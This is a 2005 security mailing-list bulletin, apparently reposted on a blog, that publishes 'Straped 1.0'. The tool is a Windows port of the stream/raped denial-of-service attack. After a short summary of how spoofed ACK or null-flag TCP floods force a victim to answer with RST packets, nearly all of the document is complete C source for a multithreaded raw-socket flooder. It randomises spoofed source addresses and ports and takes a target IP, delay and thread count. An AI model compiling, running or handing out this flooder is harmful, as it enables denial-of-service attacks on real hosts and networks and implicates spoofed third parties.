Monday, June 27, 2005

[EXPL] Stream/raped DoS

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

Stream/raped DoS
------------------------------------------------------------------------

SUMMARY

The following is a DoS proof of concept that can perform both stream and
raped attacks. The stream/raped was a denial of service written a few
years ago only for *nix machines, this is the porting for Windows. The
basic idea of stream/raped attack is very simple. It's a flood of TCP raw
packets with ACK flag set or no flag set. This flood isn't much powerful
since ACKs are very tiny datagrams but when the target machine receives
this kind of packets it replies with an RST packet. So the victim has to
reply to all spoofed source addresses with a packet and moreover if the
random generated spoofed address doesn't exist or is unreachable, when
replying with RST the target machine will also receive an ICMP packet from
the first router.

You can configure the speed of the flooding by specifying a delay argument
and if you want to amplify the number of packets you can specify a high
number of threads instead of opening more instances of the program.

DETAILS

Exploit:
/**

Straped 1.0 author: Marco Del Percio 20/05/2005

Remember: this is a mulithreaded program! MSVC++ compile with /MT.
Remember: This program requires raw socket support! You can't use it on
Windows XP SP2 and
if you've done MS05-019 update you'll have to re-enable raw socket
support! (If you still can)
see http://seclists.org/lists/nmap-hackers/2005/Apr-Jun/0001.htm for
info about this.

levante at manicomio.org

*/
#define WIN32_LEAN_AND_MEAN
#include <winsock2.h>
#include <stdio.h>
#include <ws2tcpip.h>
#include <string.h>
#include <process.h>

#pragma comment(lib, "ws2_32")

/* Global variables */
WSADATA wsa;
int delay = 1;
BOOL flag = TRUE;
HANDLE TIARRAY[256];
unsigned int target;
unsigned char attackType;

/* IP header structure */
struct ip_hdr {
unsigned char ip_hl:4, ip_v:4;
unsigned char ip_tos;
unsigned short ip_len;
unsigned short ip_id;
unsigned short ip_off;
unsigned char ip_ttl;
unsigned char ip_p;
unsigned short ip_sum;
unsigned int ip_src;
unsigned int ip_dst;
};

/* TCP header structure */
struct tcp_hdr {
unsigned short th_sport;
unsigned short th_dport;
unsigned int th_seq;
unsigned int th_ack;
unsigned char th_x2:4, th_off:4;
unsigned char th_flags;
unsigned short th_win;
unsigned short th_sum;
unsigned short th_urp;
};

#define TOTAL_LEN (sizeof(struct ip_hdr) + sizeof(struct tcp_hdr))

void flood(void *id); /* Thread flood function */

/* A common checksum function */
unsigned short checksum(unsigned short *buffer, int size) {
unsigned long cksum=0;
while(size > 1) {
cksum += *buffer++;
size -= sizeof(unsigned short);
}
if(size)
cksum += *(unsigned char*)buffer;
cksum = (cksum >> 16) + (cksum & 0xffff);
cksum += (cksum >> 16);
return (unsigned short)(~cksum);
}

int main(int argc, char *argv[]) {
int i = 0, nthreads = 1;

if( argc != 5) {
printf("\nStraped 1.0 Mix of stream/raped attack ported to Windows
by LeVante^\n\nUse:\n%s <target IP> <delay(ms)> <tcp flags: ack|null>
<number of threads>\n",argv[0]);
exit(1);
}

if(WSAStartup(MAKEWORD(2,1),&wsa)) {
fprintf(stderr, "\nError! WSAStartup failed!\n");
exit(1);
}
/* Target Ip and type of attack (tcp flags) are shared between threads
since they're global */
target = inet_addr(argv[1]);
delay = atoi(argv[2]);
if(!strcmp(argv[3],"ack"))
attackType = 0x00000010;
else if(!strcmp(argv[3],"null"))
attackType = 0x00000000;
else {
fprintf(stderr, "\nError! Tcp flags MUST be \"ack\" or
\"null\".\n");
WSACleanup();
exit(1);
}
nthreads = atoi(argv[4]);
/* No more than 256 threads allowed */
if(nthreads <=0 || nthreads > 255) {
fprintf(stderr, "\nError! Number of threads must be
between 1 and 256\n");
WSACleanup();
exit(1);
}
for(i=0;i<nthreads;i++) {
TIARRAY[i] = CreateMutex(NULL, FALSE, NULL);
/* The ID of each thread is the only argument passed to the
thread function (as a void *) */
_beginthread( flood, 0, (void *) i);
}
Sleep(100);
printf("\nPacket flooding %s with %d threads...\n", argv[1], nthreads);
//just wait
WaitForMultipleObjects(nthreads, TIARRAY, TRUE, INFINITE);
return 0;
}

void flood(void *id) {
SOCKET sock;
int delay = 1;
unsigned char packet[4096];
struct sockaddr_in sin;
unsigned short pseudo[32], seg_length = 20;
unsigned char one,two,three,four, *ptr;
unsigned char spoofed_address[7];
struct ip_hdr *ip = (struct ip_hdr *) packet;
struct tcp_hdr *tcp = (struct tcp_hdr *) (packet + 20);

WaitForSingleObject(TIARRAY[(int)id], INFINITE);
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_IP)) ==
INVALID_SOCKET) {
fprintf(stderr, "\nThread with ID %d was unable to open
socket\n", (int)id);
_endthread();
}
sin.sin_family = AF_INET;
sin.sin_port = htons(135); //this will be changed with a random
port
sin.sin_addr.s_addr = target;
memset(packet, 0, 4096);

ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_tos = 0;
ip->ip_len = htons(TOTAL_LEN);
ip->ip_id = htons((USHORT)rand());
ip->ip_off = 0;
ip->ip_ttl = 128;
ip->ip_p = 6;
ip->ip_sum = 0;
ip->ip_src = target;
ip->ip_dst = sin.sin_addr.s_addr;

tcp->th_sport = htons((USHORT)rand()); /* Random
source/destination port */
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_ack = htonl(0);
tcp->th_x2 = 0;
tcp->th_off = 5;
tcp->th_flags = attackType; /* either ack or no flags set */
tcp->th_win = htons(16384);
tcp->th_sum = 0;
tcp->th_urp = 0;

ip->ip_sum = checksum((unsigned short *) packet, 20);
ptr = (unsigned char *)pseudo;

/* These passages were NOT coded by me. They're from Sahir
Hidayatullah. These statements are based on hard coded offsets of the
various fields from the start of the datagram */

memset(pseudo,0,32); // Zero out the pseudo-header
memcpy(ptr,packet+20,20); // Copy in the tcp header
memcpy((ptr+20),packet+12,4); // Source IP
memcpy((ptr+24),packet+16,4); // Dest IP
memcpy((ptr+29),packet+9,1); // 8bit zero + Protocol
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);

if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&flag,
sizeof(flag)) < 0) {
fprintf(stderr, "\nError! Thread with ID %d was unable to set
IP_HDRINCL option\n", (int)id);
closesocket(sock);
_endthread();
}
while(1){
/* Each cycle generate a random source IP address, a
random source/destination port, a random sequence number and a random IP
id
then recalculate checksum both for IP and TCP and finally
sends out the packet */
ptr = NULL;
sin.sin_port = htons((USHORT)rand());
one = rand() % 256;
two = rand() % 256;
three = rand() % 256;
four = rand() % 256;

sprintf(spoofed_address,"%d.%d.%d.%d\0",one,two,three,four);
ip->ip_src = inet_addr(spoofed_address);
ip->ip_id = htons((USHORT)rand());
ip->ip_sum = 0;
ip->ip_sum = checksum((unsigned short *) packet, 20);
tcp->th_sport = htons((USHORT)rand());
tcp->th_dport = htons((USHORT)rand());
tcp->th_seq = htonl(rand());
tcp->th_sum=0;
/* Same passages for re-calculating pseudo-header. */
ptr = (unsigned char *)pseudo;
memset(pseudo,0,32);
memcpy(ptr,packet+20,20);
memcpy((ptr+20),packet+12,4);
memcpy((ptr+24),packet+16,4);
memcpy((ptr+29),packet+9,1);
memset((ptr+31),20,1);
tcp->th_sum = checksum(pseudo, 32);

/* Sends out the datagram. 40 bytes is the sum of IP and
TCP header length */
if(sendto(sock,packet,40,0,(struct sockaddr *) &sin,
sizeof(sin)) < 0)
printf ("Thread with ID %d. Error while sending
the packet: %d\n", (int)id, WSAGetLastError());
if(delay)
Sleep(delay);
}

}

ADDITIONAL INFORMATION

The information has been provided by <mailto:levante@manicomio.org> Marco
Del Percio.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

1 comment: